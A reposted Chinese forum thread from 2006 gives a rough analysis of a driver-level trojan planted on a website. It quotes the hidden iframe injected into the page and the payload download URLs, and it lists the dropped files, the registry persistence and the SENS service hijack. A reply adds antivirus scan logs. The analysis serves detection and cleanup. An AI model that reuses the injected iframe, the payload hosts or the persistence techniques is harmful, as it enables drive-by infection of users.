[转]今天蚂蚁上网络电视区被挂上的马的提取样本以及粗略分析

显示全部楼层 · 发表于 2006-12-1 19:33:18

今天蚂蚁上网络电视区被挂上的马的提取样本以及粗略分析

样本在附件中密码 virus

网络电视区源文件中有这样一句，而http://ddos.sesese.cn/news/admin/upline/ma.htm就是有毒的页面
<iframe width="0" height="0" src="http://ddos.sesese.cn/news/admin/upline/ma.htm"  frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

驱动级的马，安全模式下可以加载，麻烦

打开有马网页时，企图下载下面的文件
http://ddos.sesese.cn/News/admin/upline/ddos.exe
http://ddos.sesese.cn/xiazai1.exe
http://www.8442.cn/xiazai2.exe
http://www.lotsky.net/xiazai3.exe
http://www.suzwb.com/mo/hy/1.exe
http://www.suzwb.com/mo/hy/2.exe
最后两个的链接竟然失效了，无语-_-^^^^^^^^

开机是企图使用taskkill命令结束天网、安全中心等几个进程

隐藏进程：C:\Program Files\Internet Explorer\iexplore.exe

生成文件：
1。在windows目录下：iexplore.exe、tep3.exe
2。在system32目录下：qq.exe、saqzsocr.dll    （rootkit隐藏）
3。在system32\drivers目录下：saqzsocr.dll       （rootkit隐藏）
4。在IE缓存里：ddos[1].exe、xiazai1[1].exe、xiazai2[1].exe、123[1].txt、s[1].htm、xiazai3[1].htm
5。某些分区下：readme.exe、autorun.inf

修改注册表：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe qq.exe" （原为"Explorer.exe"）
HKEY_USERS\S-1-5-21-475796281-668117986-821673624-500\Software\Microsoft\Internet Explorer\Main\Start Page: "http://www.3484.cn"    （主页地址）
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

另外有一些修改IE的行为，懒得找出来，弄个软件来修复，安逸的很^_^

驱动以及服务：
1。创建：saqzsocr服务（隐藏）
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Control\ActiveService: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Service: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\DeviceDesc: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\0: "Root\LEGACY_SAQZSOCR\0000"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\Count: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\ErrorControl: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\ImagePath: "\??\C:\WINDOWS\system32\drivers\saqzsocr.sys"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\DisplayName: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Control\*NewlyCreated*:0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Control\ActiveService: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Service: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\DeviceDesc: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\0: "Root\LEGACY_SAQZSOCR\0000"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\Count: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\ErrorControl: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\ImagePath: "\??\C:\WINDOWS\system32\drivers\saqzsocr.sys"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\DisplayName: "saqzsocr"

2。修改:sens服务（System Event Notification）（无耻！）
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll"（原来为"%SystemRoot%\system32\sens.dll"）
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll"（原来为"%SystemRoot%\system32\sens.dll"）
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll"（原来为"%SystemRoot%\system32\sens.dll"）

[ 本帖最后由 navigateqd 于 2006-12-1 20:01 编辑 ]

显示全部楼层 · 发表于 2006-12-3 16:58:45

厉害的病毒，解压时候红伞杀了不少
006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
2006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
   [INFO] The file will be deleted.
2006-12-3,17:00:22 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\iexplore.exe
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
2006-12-3,17:00:22 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\iexplore.exe
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
   [INFO] The file will be deleted.
2006-12-3,17:00:24 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\readme.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Hijack.Explor.796!
  C:\Documents and Settings\dragoon\桌面\backdoor\du\企图下载的\ddos.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Hijack.Explor.796!
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
   [INFO] The file will be deleted.
2006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
   [INFO] The file will be deleted.

[转]今天蚂蚁上网络电视区被挂上的马的提取样本以及粗略分析

本帖子中包含更多资源